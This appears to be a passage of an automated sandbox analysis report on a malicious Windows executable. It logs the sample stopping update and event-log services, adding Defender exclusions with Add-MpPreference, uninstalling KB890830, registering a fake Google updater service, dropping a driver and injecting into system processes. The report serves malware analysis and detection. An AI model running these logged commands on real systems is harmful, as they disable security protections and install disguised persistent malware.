            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\ProgramData\Google\Chrome\updater.exe C:\ProgramData\Google\Chrome\updater.exe
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe dialer.exe
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe dialer.exeJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
            Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
            Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: napinsp.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: pnrpnsp.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: wshbth.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: nlaapi.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: winrnr.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: file.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: file.exeStatic file information: File size 5511680 > 1048576
            Source: file.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x52aa00
            Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 00000025.00000003.1419565451.000001A38C040000.00000004.00000001.00020000.00000000.sdmp
            Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Windows\System32\dialer.exeCode function: 65_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,65_2_00000001408460F0
            Source: file.exeStatic PE information: section name: .00cfg
            Source: updater.exe.0.drStatic PE information: section name: .00cfg
            Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BAACDD push rcx; retf 003Fh31_2_000001F385BAACDE
            Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BDC6DD push rcx; retf 003Fh31_2_000001F385BDC6DE
            Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385C0ACDD push rcx; retf 003Fh31_2_000001F385C0ACDE
            Source: C:\Windows\System32\lsass.exeCode function: 34_2_000002A2911DACDD push rcx; retf 003Fh34_2_000002A2911DACDE
            Source: C:\Windows\System32\lsass.exeCode function: 34_2_000002A2919AC6DD push rcx; retf 003Fh34_2_000002A2919AC6DE
            Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E255EACDD push rcx; retf 003Fh40_2_0000014E255EACDE
            Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E25EEC6DD push rcx; retf 003Fh40_2_0000014E25EEC6DE
            Source: C:\Windows\System32\dwm.exeCode function: 41_2_00000283E0F2ACDD push rcx; retf 003Fh41_2_00000283E0F2ACDE
            Source: C:\Windows\System32\dwm.exeCode function: 41_2_00000283E0F5C6DD push rcx; retf 003Fh41_2_00000283E0F5C6DE
            Source: C:\Windows\System32\dialer.exeCode function: 64_2_0000000140001394 push qword ptr [0000000140009004h]; ret 64_2_0000000140001403
            Source: C:\Windows\System32\svchost.exeCode function: 66_2_000001FB539AACDD push rcx; retf 003Fh66_2_000001FB539AACDE
            Source: C:\Windows\System32\svchost.exeCode function: 66_2_000001FB539DC6DD push rcx; retf 003Fh66_2_000001FB539DC6DE
            Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001CBD8BBACDD push rcx; retf 003Fh67_2_000001CBD8BBACDE
            Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001CBD8BEC6DD push rcx; retf 003Fh67_2_000001CBD8BEC6DE
            Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001F2BD14ACDD push rcx; retf 003Fh68_2_000001F2BD14ACDE
            Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001F2BD17C6DD push rcx; retf 003Fh68_2_000001F2BD17C6DE
            Source: C:\Windows\System32\svchost.exeCode function: 69_2_00000229F8B8ACDD push rcx; retf 003Fh69_2_00000229F8B8ACDE
            Source: C:\Windows\System32\svchost.exeCode function: 69_2_00000229F8BBC6DD push rcx; retf 003Fh69_2_00000229F8BBC6DE

            Persistence and Installation Behavior

            barindex
            Sample is not signed and drops a device driver
            Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\TEMP\lwouyklykeoh.sysJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\Google\Chrome\updater.exeJump to dropped file
            Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\Temp\lwouyklykeoh.sysJump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\Google\Chrome\updater.exeJump to dropped file
